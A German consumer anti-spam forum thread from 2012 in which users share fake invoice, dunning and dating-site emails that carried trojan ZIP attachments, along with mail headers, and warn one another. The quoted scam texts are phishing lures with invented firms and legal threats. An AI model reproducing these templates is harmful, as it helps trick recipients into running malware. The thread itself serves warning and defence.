Es ist sinnvoll, die Warnungen vor diesen Mails möglichst breit im Internet zu streuen, z.B. in verschiedenen Foren oder über soziale Netzwerke (aber bitte dabei nicht selber spammen). Es ist ebenso sinnvoll, die Anhänge bei den großen Antiviruslaboren einzuwerfen, wenn diese vom eigenen Virenscanner nicht erkannt werden. Und es ist sinnvoll, diese Mails auch bei den großen (Free-)Mailprovidern als Spam zu kennzeichnen, damit die möglichst bald schon serverseitig entsorgt werden.

Es ist aber nicht sinnvoll, irgendwelchen Behörden irgendwas zu melden. Die Hinterleute dieser Spamruns sind nicht so dingfest zu machen, dass eine Verfolgung durch Behörden sinnvoll wäre. Und alle weiteren Gegenmaßnahmen sollte man lieber Profis überlassen, die dann allerdings schon von sich aus tätig wären. Diese Art von Spammmails kommt aus Kreisen des organisierten Verbrechens, und solche Leute verstehen keinen Spaß, wenn man versucht, zurück zu schlagen.

Schönen Gruß in Richtung offtopic
Mittwoch

Sven Udo
01.06.2012, 21:34
Bei mir als dritte - dreiste - Mahnung Return-Path: <asdasd45 [at] email.ee>
X-Original-To: ***@arcor.de
Received: from mail-in-10.arcor-online.net (mail-in-10.arcor-online.net [151.189.21.50])
by mail-in-07-z2.arcor-online.net (Postfix) with ESMTP id 3A715E1B81
for <***@arcor.de>; Tue, 29 May 2012 10:05:37 +0200 (CEST)
Received: from mail.email.ee (unknown [194.106.111.43])
by mx.arcor.de (Postfix) with ESMTPS id 7FF4735C058
for <romanticist [at] arcor.de>; Tue, 29 May 2012 10:05:35 +0200 (CEST)
X-DKIM: Sendmail DKIM Filter v2.8.2 mx.arcor.de 7FF4735C058
Received: from 074-050-140-109.plateautel.net ([74.50.140.109] helo=hbcfserver1.hamilton.local)
by mail.email.ee with esmtpa (Exim 4.69)
(envelope-from <asdasd45 [at] email.ee>)
id 1SZHQg-0002sd-5d
for ***@arcor.de; Tue, 29 May 2012 11:05:24 +0300
MIME-Version: 1.0
Date: Tue, 29 May 2012 02:05:20 -0600
X-Priority: 3 (Normal)
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Subject: Anwender *** dritte Zahlungsaufforderung 25.05.2012 Inkassobüro
From: asdasd45 [at] email.ee
To: "***" <***@arcor.de>
Content-Type: multipart/mixed;
boundary="-----_chilkat_3b7_a6a8_671bd779.2b4b1e1d_.MIX"
Message-ID: <CHILKAT-MID-f582d3f7-bde9-2e6b-c283-a2ef6c3410d4 [at] hbcfserver1.hamilton.local>
X-DCC-ARCOR-Metrics: mail-in-07-z2 1242; Body=1 Fuz1=1
X-Arcor-Antispam: SPF_NONE RECEIVED_FROM_UNKNOWN STRANGE_CHARSET
X-ArcorSpamBlocker: Spamcount: 6 Sensitivity: 13
Von: asdasd45 [at] email.ee
An: *** <***@arcor.de>
Datum/Uhrzeit: 29.05.2012 / 10:05(Empfang)
Nachrichtenart: E-Mail 41 KB Anlagen Beantwortet
Betreff: Anwender *** dritte Zahlungsaufforderung 25.05.2012 Inkassobüro
Benutzer Konto: ***.

Guten Morgen,

in Bezug auf unsere Rechnung Nr.: 62351715 für den Nutzer *** und unsere 1. sowie auch unsere 2. Mahnung mussten wir heute feststellen, dass Ihre Zahlung bei uns noch immer nicht gebucht wurde. Dies bedeutet einen einseitigen Vertragsbruch von Ihnen. Nach geltendem Recht könnten wir die offene Kosten bereits jetzt beim Rechtsanwalt fordern. Wir geben Ihnen jedoch noch eine letzte Chance, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie innerhalb von 3 Tagen die ausstehende Rechnung in Höhe von 525.00 EURO an uns zur Zahlung bringen.

Die Dienste und die Bankdaten können Sie in beigefügtem Anhang sehen.

Vermeiden Sie unnötigen Ärger und weitere Kosten und erfüllen Sie den mit uns abgeschlossenen Vertrag.


Seohi-Dating-Online Ltd. mit Sitz in Potsdam

Geschäftsleiter: Walter Eder, Gerhard Eder
Aufsichtsratsvorsitzender: Andreas Schneider
Gesellschaftssitz: Augsburg

Anlagen Mahnbescheid.zip (41 KB) Es wurde eine alias Adresse von mir verwendet. Mit dazugehörigem Nick.

Der Mahnbescheid.zip enthält einen Trojaner: Win32/VBInject :skull:

IP: 194.106.111.43 Estonia | DNS BlackList results: IP.v4BL.org

3853

Helmi98
02.06.2012, 16:18
Auf gutefrage.net gibt es seit vorgestern massenweise Fragen zu solchen Mails von Flirt-Fever. In einer davon hieß es: "Gericht: Keiserslautern". DIE haben dazugelernt. Nur noch ein Fehler im Ortsnamen! :)

Natürlich hat laut diesen Mails Flirt-Fever immer eine andere Stadt als Sitz und die Namen der Geschäftsführer sind auch immer anders.

Nur haben sie alle auch einen zip-Anhang in der Mail, der natürlich auch nicht geöffnet werden sollte.

Da wurden Kundendaten von Flirt-Fever geklaut (oder verkauft?)!

Arthur
02.06.2012, 17:54
Siehe >> http://www.antispam-ev.de/forum/showthread.php?33569-vor-Viren-Mails-mit-Betreff-Lieferschein-Rechnung-Mahnung-Forderung

Viren-Mails mit Betreff: Lieferschein / Rechnung / Mahnung / Forderung (http://www.antispam-ev.de/forum/showthread.php?33569-vor-Viren-Mails-mit-Betreff-Lieferschein-Rechnung-Mahnung-Forderung)

Helmi98
02.06.2012, 18:24
Das habe ich schon gelesen. Ich wollte das hier nur mitteilen.

Cliofrau28
11.06.2012, 09:22
Das ist zur Zeit Mode, ich und mehrere Arbeitskollegen haben auch eine E Mail von Flirtfever bekommen wo wir angeblich irgendwelche Abo´s abgeschlossen haben obwohl dort keiner von uns registriert ist! Nun sollen wir horrende Summen ( 464 Euro, 999 Euro, 1300 Euro ) etc bezahlen! Frage mich dann immer wo die die Nummern bzw die E-Mail Adressen herbekommen :mad:

Gruß Cliofrau

blowfish
11.06.2012, 11:56
haben auch eine E Mail von Flirtfever bekommen wo wir angeblich irgendwelche Abo´s abgeschlossen haben obwohl dort keiner von uns registriert ist
Auf keinen Fall den ZIP-Anhang öffnen. Der kommt nicht von Flirtfever. Da hängt ein Trojaner drinn, der dann deinen Rechner blockiert.

kjz1
11.06.2012, 15:57
Frage mich dann immer wo die die Nummern bzw die E-Mail Adressen herbekommen

Wo andere Spammer halt auch so ihre Quellen haben: Adresshandel, Webspider, gecrackte Datenbanken, etc...

truelife
11.06.2012, 22:00
Hier reingerieselt mit folgenden Text:


Guten Tag H. T.,

Besten Dank für Ihren Einkauf bei Mirapodo Deutschland, nachfolgend finden Sie Ihre Kaufbestätigung.

Deine Transaktionsnummer: 913449683544
Bestellte Ware: Toshiba 5830222500 6880,50 Euro
Rechnung auf den Namen: H. T.
Abrechnung erfolgt durch: Lastschrift

Lieferadresse und detaillierte Rechnung finden Sie zwecks Sicherheitsgründen im zugefügtem Zip Ordner.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage abgeschrieben.
Kaufdetails und Widerruf Erklärung finden Sie in Beilage.


Ihr Kundensupport

Engel GmbH
Böcklerstrasse 21
42376 München

Telefon: (+49) 285 8616924
(Mo-Fr 8.00 - 17.00 Uhr, Sa 11.00 bis 15.00 Uhr)
Gesellschaftssitz Aulendorf
Umsatzsteuer-Nummer: AT264313436
Geschäftsleiter:

Helmi98
12.06.2012, 19:10
München und Plz 42376! :)

Wenn DIE mir verraten würden, wer SIE sind, würde ich IHNEN das Deutsche Postleitzahlenbuch zusenden. Natürlich auch virenverseucht. DIE müssen dann halt noch so lange warten, bis ich mal wieder erkältet bin. So mit gebrauchten Papiertaschentüchern als Lesezeichen! :)

madman70
13.06.2012, 09:38
Hallo,

hier auch mal wieder eine putzige Mahnung:


Hallo xxxxx,

Sicher ist es Ihnen entgangen, dass die Zahlfrist der nachfolgenden Rechnung abgelaufen ist. Auf zwei Erinnerungen haben Sie auch nicht reagiert.

Artikel: Leica 2Gen WD
Artikelnummer: 5738234931707
Mänge: 2
Betrag: 631,35 Euro

Wegen zusätzlichen Kosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 40.- Euro inkl. MwSt.

Wir bitten Sie, den ausstehenden Rechnungsbetrag in den nächsten 7 Tagen zu überweisen. Im Unglücksfall sehen wir uns leider gezwungen, ein Gerichtsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Mahnungsschreiben mit der Bezahlung des ausstehenden Betrags zeitlich überschnitten haben, so betrachten Sie dieses Schreiben bitte als gegenstandslos.

Anlagen für Kunde xxxxx:
- Rechnung
- Artikel

Mit freundlichen Grüßen

Keller GmbH
Billufer 09
Bremen

Telefon: (0900) 835 0155994
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Bad Bergzabern
Umsatzsteuer-ID: DE467662061
Geschäftsfuehrer: R. K.


Ich hoffe, mich ereilt jetzt nicht der angedrohte Unglücksfall - ausser vielleicht, ich öffne den Anhang namens "Vorderung.zip" :-)

Hier noch ein Header dazu:


Return-Path: rawdc [at] montereybay.com
Received: from mail.montereybay.com ([216.228.2.51]) by mx-ha.web.de (mxweb001) with ESMTP (Nemesis) id 0LgJj2-1S8iEA2Xoa-00o9d6 for <schmimat [at] web.de>; Tue, 12 Jun 2012 16:27:23 +0200
Received: (qmail 92133 invoked by uid 89); 12 Jun 2012 14:27:19 -0000
Received: from 71-8-232-70.static.krny.ne.charter.com (HELO 2003server) (71.8.232.70) by mail.montereybay.com with SMTP; Tue, 12 Jun 2012 07:27:19 -0700
MIME-Version: 1.0
Date: Tue, 12 Jun 2012 09:28:50 -0500
X-Priority: 3 (Normal)
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Subject: PokaMax Mahnung für xxxxx Artikel 0009272555980
From: rawdc [at] montereybay.com
To: "xxxxx" <xxxxx [at] web.de>
Content-Type: multipart/mixed; boundary=-----_chilkat_112_caed_5aa926f4.677ac14f_.MIX
Message-ID: <CHILKAT-MID-45d36743-ffab-4e0b-2a6b-763b70002479 [at] 2003server>
Envelope-To: <xxxxx [at] web.de>
X-UI-Filterresults: ;V01:K0:r7yQQM3X:9jQ1UMpZ/VLAaadhTKqEbpGvMSDJm/ikKT9 n9YFdmIE7igdEcP8nUJjSh1DO3JZG4GJgN80qfNj7Mu0/4ThLG0avJ7CMpYF/lwyY9CeR1E k2pgYbdo5RZPxjxncGvxyteVuFVC2XFbhSUZWRei36SQtKeLlecyPSxVFVzp44RzLTLkG33 8NG4+ZIuJTnD38+pLpYetz8bUZMtdkDX6SUZw==
Ordner: Unbekannt
Größe: 85 KB



Grüße, madman

Gaia
13.06.2012, 09:58
Bei der Mehrwertdienstnummer fehlt die Preisangabe und die Postleitzahl ist scheinbar auch untergegangen.
Man wird nachlässig oder findet sich im eigenen Gewusel net mehr zurecht :D

madman70
13.06.2012, 10:18
Oooch - vielleicht ist ja Bremen nicht so groß - das findet der Postmann sicher auch so :D

Hab grad noch eine Mail an abuse [at] charter.com rausgeschickt - von dort is das ja wohl eingekippt worden...

Wowoka
13.06.2012, 17:17
Oooch - vielleicht ist ja Bremen nicht so groß - das findet der Postmann sicher auch so

Wenn es denn die gefakte Anschrift überhaupt gäbe. Deshalb kann in diesem Fall auch der aufmerksamste Postbote nichts zustellen.

Helmi98
13.06.2012, 18:05
@madman70

"...ein Gerichtsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen."

Das sollte doch anders herum sein!

Und dann auch noch ein "Geschäftsführer", der so arm ist, dass er sich als Namen nur zwei Buchstaben leisten kann. :)

Helmi98
14.06.2012, 19:05
DIE haben wieder eine neue Masche drauf!

http://www.gutefrage.net/frage/weitere-abzocke-email-von-einer-softking-gmbh


diese E-Mail wurde bei der Eröffnung von 1 O2 Mobilfunk Verträgen (?) angegeben.
Angeblich wurden die Simkarten bei der Vertragsunterzeichnung zur Verfügung gestellt. Es wurde mehrfach versucht diese mit 2 IPhones 4S an die angegebene Adresse zuzustellen, was aber misslang. Jetzt wird nachgefragt, was damit geschenhen soll.

In Beilage steckt Kopie des Vertrags, die Ausweis-Kopie des Vertrages (ja genau, einmal Vertrags und einmal Vertrages, Rechnungen sowie der Einzelverbindungsnachweis.

Softking GmbH Herrmannstal 35 Stuttgart

Und hier noch so eine:

http://www.gutefrage.net/frage/abzocke-email-

fischkopp
14.06.2012, 20:43
Habe heute das hier bekommen:


Sehr geehrter fischkopp,

Sicher ist es Ihnen entgangen, dass die Bezahlfrist der nachfolgenden Rechnung abgelaufen ist. Auf zwei Erinnerungen haben Sie auch nicht reagiert.

Ihre Bestellung: Apple THK SJ
Artikelnummer: 4785201183206
Stück: 2
Zwischensumme: 936,52 Euro

Durch entstandene zusätzliche Kosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 40.- Euro inkl. MwSt.

Wir bitten Sie, die gesammte Summe in den nächsten 7 Tagen zu überweisen. Im Unglücksfall sehen wir uns leider gezwungen, ein Betreibungsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Schreiben mit der Zahlung des ausstehenden Betrags gekreuzt haben, so betrachten Sie dieses Schreiben bitte als gegenstandslos.

Beilagen für Kunde fischkopp:
- Rechnungsübersicht
- Artikel

Mit besten Grüßen

Becker GmbH
Auersreihe 29
Keiserslauter

Telefon: (0900) 030 8497324
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Essen
Umsatzsteuer-ID: DE502705567
Geschäftsfuehrer: xxx

Der zip-Anhang ist laut GData Antivirus mit einem Trojaner verseucht. Abgesehen davon, dass ich sowas natürlich nie bestellt habe, ist die ganze Email voller Fehler. Die Steuer-ID ist formal falsch, die Adresse Auersreihe 29 in Keiserslauter (!) existiert offenbar nicht, Telefon 0900 030 xxxx ist Schwachsinn (wenn schon, dann bitte die richtige Vorwahl von KL), welche Erinnerungen, und was ist überhaupt ein Apple THK SJ? :hammer:

Wer also sowas bekommt, kann es getrost in den Mülleimer verschieben.

Helmi98
14.06.2012, 21:06
Lernen DIE es je noch, Kaiserslautern richtig zu schreiben? :D

truelife
17.06.2012, 09:02
Hier doppelt aufgeschlagen. Zumindest die Initialen stimmen bei mir nun, der Rest ist immer wieder die gleiche Grütze.


Sehr geehrter

Sicher ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Rechnung abgelaufen ist. Auf zwei Schreiben haben Sie auch nicht reagiert.

Ihre Bestellung: Dell Life VP
Artikelnummer: 5160898772433
Stück: 4
Zwischensumme: 723,03 Euro

Aufgrund zusätzlicher Kosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 10.- Euro inkl. MwSt.

Wir bitten Sie, den ausstehenden Rechnungsbetrag in den nächsten 7 Tagen zu überweisen. Ansonsten sehen wir uns leider gezwungen, ein Inkassoverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Mahnungsschreiben mit der Bezahlung des ausstehenden Betrags gekreuzt haben, so betrachten Sie dieses Mahnungsschreiben bitte als gegenstandslos.

Anlagen:
- Rechnung
- Bestellung

Mit besten Grüßen

Dnet24 GmbH


Sehr geehrter

Sicher ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Rechnung abgelaufen ist. Auf zwei Erinnerungen haben Sie auch nicht reagiert.

Ihre Bestellung: IBM Intaste JW
Artikelnummer: 0686976762611
Stück: 1
Summe: 794,11 Euro

Aufgrund zusätzlicher Kosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 10.- Euro inkl. MwSt.

Wir bitten Sie, den ausstehenden Rechnungsbetrag in den nächsten 7 Tagen zu überweisen. Ansonsten sehen wir uns leider gezwungen, ein Gerichtsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Schreiben mit der Zahlung des ausstehenden Betrags gekreuzt haben, so betrachten Sie dieses Mahnungsschreiben bitte als gegenstandslos.

Beilagen:
- Zahlschein
- Bestellung

Mit freundlichen Grüßen

FOTO THUN GMBH

maritim
17.06.2012, 16:27
Hallo,

hier auch mal wieder eine putzige Mahnung...


Hallo, ich vermute, die E-mail, die ich am 13.06 erhalten habe, stammt von derselben Person:


Sehr geehrter Benutzer XXX,
sicherlich ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Rechnung abgelaufen ist. Auf unsere Erinnerungen haben Sie ebenfalls nicht reagiert.

Ihre Bestellung: Lenovo THK RV
Artikelnummer: 6945104000774
Stück: 2
Betrag: 567,14 Euro

Wegen zusätzlichen Unkosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 60.- Euro inkl. MwSt.

Wir bitten Sie, den Gesamtbetrag in den nächsten 7 Tagen zu überweisen. Im Unglücksfall sehen wir uns leider gezwungen, ein Inkassoverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Schreiben mit der Zahlung des ausstehenden Betrags gekreuzt haben, so betrachten Sie dieses Schreiben bitte als gegenstandslos.

Anlagen:
- Rechnung
- Lieferschein

Mit freundlichen Grüßen

Walter GmbH
Audorfring 49
Dortmund

Telefon: (0900) 708 4902342
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Bad Aibling
Umsatzsteuer-ID: DE043145291
Geschäftsfuehrer: Niels Schmitt

Als Anhang eine Zip-Datei, die sich beim entpacken im Onlinespeicher als Ms-dos- anwendung ausgewiesen hat und nicht geöffnet wurde. Danach wurde alles gesäubert und der Virenscan eingeschaltet. Ohne Befund. Noch :rolleyes: Schade, dass ich das Forum so spät gefunden habe.


Return-Path: cp286 [at] 21cn.com
Received: from 21cn.com ([59.36.102.63]) by mx-ha.web.de (mxweb008) with ESMTP (Nemesis) id 0LsCRL-1RwZx80IAx-013ca0 for <xxxxxxxxx>; Wed, 13 Jun 2012 xxxxxxxxxxxxxxxxxx
Received: from ip?68.163.72.231? (unknown [10.27.2.12]) by 21cn.com (HERMES) with ESMTP id A67224274AC for xxxxxxxxxxxxxxxxxxxxxxxxx
Received: from ip<68.163.72.231> ([68.163.72.231]) by -AUTH LOGIN(Yuwen filter gate 10.27.2.12) with ESMTP id 1339566062.14503 for xxxxxxxxxxxxxxxxxxx

truelife
12.07.2012, 06:00
Weiterer Run, neue Texte:


Sehr geehrter Benutzer H. T.,

Auf zwei Erinnerungen ist keine Reaktion von ihnen erfolgt. Bestimmt ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Rechnung verstrichen ist.

Zwischensumme: 840,43 Euro
Stück: 1
Gelieferte Ware: Sony Core GE
Artikel Nr.: 4069994206122

Wegen zusätzlichen Unkosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 40.- Euro

Falls in den nächsten 5 Tagen der Gesamtbetrag nicht überwiesen wird, sehen wir uns leider gezwungen, ein Gerichtsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Betrachten Sie dieses Mahnungsschreiben bitte als gegenstandslos, falls sich dieses Mahnungsschreiben mit der Zahlung des ausstehenden Betrags zeitlich überschnitten haben sollte.

Beilagen:
- Rechnungsübersicht
- Lieferschein

Mit besten Grüßen

Schuster GmbH
Culinstrasse 53
Bielefeld

Telefon: (0180) 959 6983089
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Alzey
Umsatzsteuer-ID: DE676280920
Geschäftsfuehrer: Lukas Wagner

From - Wed Jul 11 11:41:25 2012
X-Account-Key: account1
X-UIDL: 01afm2-1SL9dr1ev6-00Tml9
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <manfred.rosenhagen [at] t-online.de>
Delivered-To: GMX delivery to truelife [at] gmx.de
Received: (qmail invoked by alias); 11 Jul 2012 09:34:38 -0000
Received: from mailout07.t-online.de (EHLO mailout07.t-online.de) [194.25.134.83]
by mx0.gmx.net (mx048) with SMTP; 11 Jul 2012 11:34:38 +0200
Received: from fwd15.aul.t-online.de (fwd15.aul.t-online.de )
by mailout07.t-online.de with smtp
id 1SotJe-0006G5-2h; Wed, 11 Jul 2012 11:34:38 +0200
Received: from PCPSRV1 (Xpx65EZBQh4Meh-tyKzeuDYcM6jlMoOS+5NuEhLM67xeP8u8iin4-WvDPN7tPJ+gaT@[207.145.140.242]) by fwd15.t-online.de
with esmtp id 1SotJT-0uh6BM0; Wed, 11 Jul 2012 11:34:27 +0200
MIME-Version: 1.0
Date: Wed, 11 Jul 2012 05:34:22 -0400
X-Priority: 3 (Normal)
X-Mailer: IPB PHP Mailer 93
Subject: =?iso-8859-1?Q?SP24.com_Mahnung_?=
=?iso-8859-1?Q?f=FCr_Hakan_Tasgin_?=
=?iso-8859-1?Q?Artikel_834313773?=
=?iso-8859-1?Q?4791_10.07.2012?=
From: manfred.rosenhagen [at] t-online.de
To: "Hakan Tasgin" <TrueLife [at] gmx.de>
Content-Type: multipart/mixed;
boundary="-----_chilkat_6de_4bb9_51684f0b.81a64203_.MIX"
Message-ID: <OUTLOOK-IDM-15c6dffb-e8bc-3673-7534-eaa76cd3f79d [at] PCPSRV1>
X-ID: Xpx65EZBQh4Meh-tyKzeuDYcM6jlMoOS+5NuEhLM67xeP8u8iin4-WvDPN7tPJ+gaT
X-TOI-MSGID: 32aa5607-f0ba-4d7a-83b4-dabc5aecc368
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 0 (Mail was not recognized as spam);
Detail=5D7Q89H36p6QcpxJ5OWiRkVBN7lH7VaTYkq3CSfnBUSc6T4Ky0IL2O60s0pxeauPtLrgO
ACagvCcyULegWM3x8ASZSil2pDNLLOAVjTP/0LN37Ls/MV+ZeYJYz0CR4+BPUAVi9KX8ZfeMIOnW
K82iG6Y1MHznvF10tixpnH6y0IMr655VwicIg==V1;


Im Anhang steckt eine wichtig.zip, darin dann der Trojaner "tr/drop.injector.fhdt" --> GVU Trojaner mit 100 Euro Zahlungsaufforderung

blizzy
12.07.2012, 09:47
Und GMX hat die Mail weder als Spam erkann noch den Virus drin gefunden...

Fidul
12.07.2012, 14:09
Im Anhang steckt eine wichtig.zip, darin dann der Trojaner "tr/drop.injector.fhdt" --> GVU Trojaner mit 100 Euro Zahlungsaufforderung
Der kommt heutzutage schon mit Webcam-Unterstützung: http://heise.de/-1636582

KaiHH
12.07.2012, 16:26
Mit Verlaub: Was sind "Unkosten"?

Sind das: unglaublich hohe Kosten oder ungaublich dämliche Kosteneintreiber? ;)

Mittwoch
12.07.2012, 16:40
Mit Verlaub: Was sind "Unkosten"?
http://faql.de/wortgebrauch.html#unkosten via http://de.wikipedia.org/wiki/Unkosten

dieterm
13.07.2012, 11:01
hallo

ich hab vor ein paar tagen eine email in form einer mahnung erhalten. die absender adresse bestand aus einem deutschen vor- und nachnamen mit der endung web.de.

hier die email:
Sehr geehrter Benutzer xxxxxx xxxxxxxxx,

Auf zwei Schreiben ist keine Reaktion von ihnen erfolgt. Vielleicht ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Buchung abgelaufen ist.

Zwischensumme: 826,28 Euro
Stück: 4
Artikel: Siemens IDK FA
Artikelnummer: 8077564209574

Aufgrund zusätzlicher Unkosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 90.- Euro

Falls in den folgenden 6 Tagen der Gesamtbetrag nicht überwiesen wird, sehen wir uns leider gezwungen, ein Inkassoverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Betrachten Sie dieses Mahnungsschreiben bitte als gegenstandslos, falls sich dieses Schreiben mit der Bezahlung des ausstehenden Betrags zeitlich überschnitten haben sollte.

Anlagen:
- Rechnungsübersicht
- Bestellung

Mit freundlichen Grüßen

Weber GmbH
Bergstieg 96
Keiserslauter

Telefon: (0180) 448 7221128
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Ahlen
Umsatzsteuer-ID: DE588168582
Geschäftsfuehrer: Leona Otto

Der name in der Anrede ist nicht mein name und ich habe selbstverständlich nie was bei dieser firma (die es wohl auch garnicht gibt) bestellt.
die email hatte einen anhang welcher sich als trojaner entpuppte.


Nun zu meinen Fragen:
damit man sich bei web.de anmelden kann, muss man bei der registrierung seine tatsächliche anschrift usw angeben und man erhält dann post (echter brief) mit einem code den man zur bestätigung auf web.de angeben muss.
von daher müsste eine emailadresse bei web.de ungeeignet sein zum versenden von trojanern, da das ja wohl eine strafbare handlung ist und web.de die anschrift usw des nutzers kennt.
kann man davon ausgehen, dass diese emailadresse, von der ich den spam erhalten hatte, gehackt wurde?
ich wollte auf web.de den spam melden, habe dort aber keine entsprechende funktion gefunden. habe ich vielleicht was übersehen?
gibts es sonst irgendwelche möglichkeiten um spam/trojanerversand zu melden damit das eventuell auch strafrechtlich untersucht wird?

dank im vorraus
dieter

cmds
13.07.2012, 11:08
Tacker in Regal lege

schara56
13.07.2012, 11:09
Dazu gibt es schon ein Thema (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung) - @Mods: bitte tackern

...] damit man sich bei web.de anmelden kann, muss man bei der registrierung seine tatsächliche anschrift usw angeben und man erhält dann post (echter brief) mit einem code den man zur bestätigung auf web.de angeben muss. [...Ohne Header kann man gar nicht sagen, ob das überhaupt von Web.de kam. Die Absender-Adresse (reply-to) kann beliebig eintragen werden.

...]kann man davon ausgehen, dass diese emailadresse, von der ich den spam erhalten hatte, gehackt wurde? [...Theoretisch ja, ich vermute aber eine gefälschte reply-to-Adresse

...] gibts es sonst irgendwelche möglichkeiten um spam/trojanerversand zu melden [... http://www.spamcop.net

Goofy
13.07.2012, 11:10
Oft werden diese Mails von gehackten Mailaccounts versendet, d.h. dem Inhaber eines web.de-Accounts ist sein Zugangspasswort gehackt worden. Oder die Absendeadresse (Reply-To) ist gefälscht. Die Täter sind i.d.R. Russen und nicht ermittelbar.

truelife
16.07.2012, 13:27
Neuer Versuch, gleiche Datenquelle:


Hallo ,

Sofort wird es erotisch. In deinem Postfach befinden sich neue Meldung.
Bestimmt dein Traumpartner? Finde es heraus!

Die Nachricht befindet sich in der beigefügten Datei.

Eure Erotik Gemeinschaft
Achtung Diese Mail erhältst du aufgrund deiner Mitgliedschaft.

Im Anhang befindet sich eine Nachricht.zip

Return-Path: <crkethan [at] kingwoodcable.net>
Delivered-To: GMX delivery to truelife [at] gmx.de
Received: (qmail invoked by alias); 14 Jul 2012 07:29:52 -0000
Received: from txlegofep02.suddenlink.net (EHLO txlegofep02.suddenlink.net) [208.180.40.76]
by mx0.gmx.net (mx075) with SMTP; 14 Jul 2012 09:29:52 +0200
Received: from mex2003a.mexeagle.local ([66.155.205.117])
by txlegofep02.suddenlink.net
(InterMail vM.7.09.01.03 201-2219-108-104-20100907) with ESMTP
id <20120714072949.OMAX23718.txlegofep02.suddenlink.net [at] mex2003a.mexeagle.local>
for <TrueLife [at] gmx.de>; Sat, 14 Jul 2012 02:29:49 -0500
MIME-Version: 1.0
Date: Sat, 14 Jul 2012 03:24:32 -0400
X-Priority: 3 (Normal)
X-Mailer: IPB PHP Mailer 94
Subject: =?iso-8859-1?Q?Neue_Nachricht_f=FC?=
=?iso-8859-1?Q?r_TrueLife_14.07.?=
=?iso-8859-1?Q?2012?=
From: crkethan [at] kingwoodcable.net
To: "TrueLife" <TrueLife [at] gmx.de>
Content-Type: multipart/mixed;
boundary="-----_chilkat_ff4_b977_fe218d01.8b3a0730_.MIX"
Message-ID: <OUTLOOK-IDM-9310a783-e9bd-4005-ecad-abe6a6fcd806 [at] mex2003a.mexeagle.local>
X-Cloudmark-Analysis: v=1.1 cv=VETwTmBfWKShyz/eOAHyMEE4cAMhOTnUYWRKBlUO0yI= c=1 sm=0 a=KE_qcvql5UAA:10 a=dNb0GxJwOzUA:10 a=jPJDawAOAc8A:10 a=audjsN3uTWWX6hHgWjcA:9 a=wPNLvfGTeEIA:10 a=h8cmCR6lAAAA:8 a=NanZbqhIW7VEPJcznrEA:9 a=IKIoO-ieCDEA:10 a=NWVoK91CQyQA:10 a=HpAAvcLHHh0Zw7uRqdWCyQ==:117
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 5 (eXpurgate);
Detail=5D7Q89H36p7RD0ZwpkL6+eQgmvCvQtD8tE4gQ4yR9sW4hdbDtVqqax/mYU0nj5IBIzR3r
GvZgPHHpXGocv3HGTJPpx9ZfUwFYtYS0PRq12BCN/FrCYOOlXju0QaEMDybQJAfMk1aONpXKUTaE
S0Zro3zC3a1j0jLcMrA9yUqr9eoUeQak42xSy/G0oHfuc7C0352Mzx4nceWtd7oX0rkWw==V1;
X-GMX-UID: Nzg1NOtYM0hEUuU4i2VtW/VkdcnfsNOD
X-Flags: 1401


Selbe Datenliste wird hier auch angespammt - da werden Geldwäscher gesucht: http://antispam-ev.de/forum/showthread.php?33784-Mystery-Shopper-gesucht-landesweit!&p=338134#post338134

truelife
16.07.2012, 13:31
Und noch eine Mahnung hinterher:


Sehr geehrter Nutzer TrueLife,

